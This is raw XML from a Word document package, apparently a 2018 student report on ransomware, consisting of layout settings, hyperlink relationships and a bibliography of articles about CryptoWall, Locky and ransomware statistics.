    <w:div w:id="1725369873">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1727292466">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1739090645">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1744333235">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1781299553">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1792747223">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1800142856">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1806465445">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1808084036">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1808275325">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1843624973">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1877044436">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1886015808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1896163494">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1900313991">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1924413642">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1928810524">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1947614923">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1949459129">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2018119234">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2026637063">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2036494837">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2042514805">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2047874133">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2074765707">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2086873068">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2093117283">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2102947575">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2112696396">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2131242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blog.checkpoint.com/wp-content/uploads/2016/03/Follow-TCP-Stream.png" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://technet.microsoft.com/en-us/library/cc786941(v=ws.10).aspx" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpg" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/kb/310791" TargetMode="Externa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hyperlink" Target="http://blog.checkpoint.com/wp-content/uploads/2016/03/Capture.jpg" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg"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hyperlink" Target="https://www.bleepstatic.com/swr-guides/c/cryptowall/decrypt-service.jpg" TargetMode="External"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fontTable" Target="fontTable.xml" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/glossaryDocument" Target="/word/glossary/document.xml" Id="R47fc19b4fe53402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51a09b1-57da-428a-a4b9-519c06fc190c}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w14:paraId="52CD5C3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Cry</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0B7A2ACE-1330-4701-880A-0BD3B473C95A}</b:Guid>
    <b:Title>Cryptowall-Ransomware-Information</b:Title>
    <b:InternetSiteTitle>www.bleepingcomputer.com</b:InternetSiteTitle>
    <b:URL>https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#CryptoWall</b:URL>
    <b:Year>2018</b:Year>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Bri</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{AC2A0C4D-CEDD-4EC4-9532-CFB5B479EF6D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Booker</b:Last>
            <b:First>Brian</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>CryptoWall: Hackers using bitcoin to demand ransoms </b:Title>
    <b:ProductionCompany>CryptoWall: Hackers using bitcoin to demand ransoms </b:ProductionCompany>
    <b:URL>https://99bitcoins.com/cryptowall-hackers-using-bitcoin-to-demand-ransoms/</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ran18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{D223BDB4-7F72-44C9-A5A6-4617A81E84D4}</b:Guid>
    <b:Title>Ransomware</b:Title>
    <b:Year>2018</b:Year>
    <b:ProductionCompany>Wikipedia</b:ProductionCompany>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://en.wikipedia.org/wiki/Ransomware</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Cas16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{4ABBD663-E395-4771-8FB3-2A47CA5954B1}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Puodzius</b:Last>
            <b:First>Cassius</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>How-Encryption-Molded-Crypto-Ransomware/</b:Title>
    <b:ProductionCompany>welivesecurity.com</b:ProductionCompany>
    <b:Year>2016</b:Year>
    <b:Month>12</b:Month>
    <b:Day>13</b:Day>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>11</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://www.welivesecurity.com/2016/09/13/how-encryption-molded-crypto-ransomware/</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ran16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6CA16D2C-4544-4B41-91AB-57DA47847B05}</b:Guid>
    <b:Title>Ransomware-Statistics-2016</b:Title>
    <b:ProductionCompany>blog.barkly.com</b:ProductionCompany>
    <b:Year>2016</b:Year>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>11</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://blog.barkly.com/ransomware-statistics-2016</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>oni18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{CBE1AA4F-5A1A-4C33-9AA6-D4DCEAD48617}</b:Guid>
    <b:Title>onion-ransomware-virus-threat</b:Title>
    <b:ProductionCompany>Kaspersky</b:ProductionCompany>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>11</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://usa.kaspersky.com/resource-center/threats/onion-ransomware-virus-threat</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>loo18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{27AE8679-9176-4273-B826-8C60CDAA6138}</b:Guid>
    <b:Title>look-into-locky</b:Title>
    <b:ProductionCompany>Malwarebytes</b:ProductionCompany>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>11</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/</b:URL>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ran18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{F41F6B57-A1BD-4A0A-8C4E-5C6E8A79ABE6}</b:Guid>
    <b:Title>ransomware-statistics-2018</b:Title>
    <b:ProductionCompany>blog.barkly.com</b:ProductionCompany>
    <b:Year>2018</b:Year>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>11</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://blog.barkly.com/ransomware-statistics-2018</b:URL>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>loc18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6070284B-9243-4142-8E3B-F360B5C148A7}</b:Guid>
    <b:Title>locky-ransomware/</b:Title>
    <b:ProductionCompany>checkpoint.com</b:ProductionCompany>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>11</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://blog.checkpoint.com/2016/03/02/locky-ransomware/</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>The18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{EE27AAB0-4F1D-4CF8-B559-82A716CD5CC9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>The</b:First>
            <b:Middle>Barkly</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>ransomware-statistics-2018</b:Title>
    <b:Year>2018</b:Year>
    <b:Month>August</b:Month>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://blog.barkly.com/ransomware-statistics-2018</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>cry</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3D4D21DF-12B1-49C3-87E4-7D1CCB55DD0B}</b:Guid>
    <b:Title>cryptowall-ransomware-information</b:Title>
    <b:URL>https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Cod16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{D5EE5141-5CC6-44E2-977B-35155CE89915}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Codesynced</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>pastebin.com/AxKy1tyK</b:Title>
    <b:Year>2016</b:Year>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://pastebin.com/AxKy1tyK</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>bit18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{E3A74DC3-169E-4ECD-BA42-6EDF5738F502}</b:Guid>
    <b:Title>bitcoin.org/en/</b:Title>
    <b:Year>2018</b:Year>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://bitcoin.org/en/</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>cry18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3EE4FC32-F506-407F-AA2F-BA5503B850F8}</b:Guid>
    <b:Title>cryptowall-ransomware-information#ransom</b:Title>
    <b:ProductionCompany> Bleeping Computer</b:ProductionCompany>
    <b:Year>2018</b:Year>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#ransom</b:URL>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>cry181</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{51E636B9-6F05-43C3-9803-4B69A28109E5}</b:Guid>
    <b:Title>cryptowall-ransomware-information#cryptoprevent</b:Title>
    <b:Year>2018</b:Year>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>11</b:DayAccessed>
    <b:URL>https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#cryptoprevent</b:URL>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>cry16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{9ABBA77D-2F53-4B3C-AFB6-7430781BEAEE}</b:Guid>
    <b:Title>cryptowall-ransomware-information#restore</b:Title>
    <b:ProductionCompany>bleepingcomputer</b:ProductionCompany>
    <b:Year>2016</b:Year>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>Novomber</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#restore</b:URL>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5EA0716C-D178-41BC-9678-3F39711DA8B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Kris Cole</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Kristian Cole (1810705)</lastModifiedBy>
  <revision>185</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-19T11:14:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-02T15:55:48.4560494Z</dcterms:modified>
</coreProperties>
</file>